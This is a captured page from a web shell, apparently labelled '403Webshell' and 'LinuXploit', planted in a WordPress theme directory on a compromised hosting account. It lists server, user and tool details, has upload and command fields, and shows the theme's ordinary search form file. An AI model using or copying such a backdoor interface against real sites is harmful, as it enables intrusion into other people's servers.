403Webshell
Server IP : 172.67.178.83  /  Your IP : 216.73.217.141
Web Server : Apache
System : Linux hosting01.arsenalhost.com 4.18.0-425.13.1.lve.el8.x86_64 #1 SMP Mon Feb 27 15:23:24 EST 2023 x86_64
User : corbizre ( 1013)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/corbizre/officespace4lease.com/wp-content/themes/sesame/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/corbizre/officespace4lease.com/wp-content/themes/sesame/searchform.php
<?php
/**
 * The Search Form.
 * @author Realtyna Inc.
 */
global $sesame_options;

// WP search widget is set to search on listings
if(isset($sesame_options['search_on_properties']) and $sesame_options['search_on_properties'] == 1 and function_exists('_wpl_import'))
{
    $sesame_action_name = wpl_property::get_property_listing_link();
    $sesame_search_name = 'sf_textsearch_textsearch';
    $sesame_search_value = (isset($_GET['sf_textsearch_textsearch']) ? sanitize_text_field(wp_unslash($_GET['sf_textsearch_textsearch'])) : '');
}
// It's set to search on WordPress posts/pages
else
{
    $sesame_action_name = esc_url(home_url('/'));
    $sesame_search_name = 's';
    $sesame_search_value = get_search_query();
}
?>
<div class="re-search clearfix">
    <form role="search" method="get" class="search-form" action="<?php echo esc_attr($sesame_action_name); ?>">
        <input type="search" class="search-field" placeholder="<?php echo esc_attr__('Enter your search term', 'sesame'); ?>" value="<?php echo esc_attr($sesame_search_value); ?>" name="<?php echo esc_attr($sesame_search_name); ?>" />
        <div class="search_submit_box">
            <button type="submit" class="search-submit"><?php echo esc_html__('Search', 'sesame');?></button>
        </div>
    </form>
    <button class="re-search-toggle"><span class="screen-reader-text"><?php echo esc_html__('Close Search', 'sesame');?></span></button>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit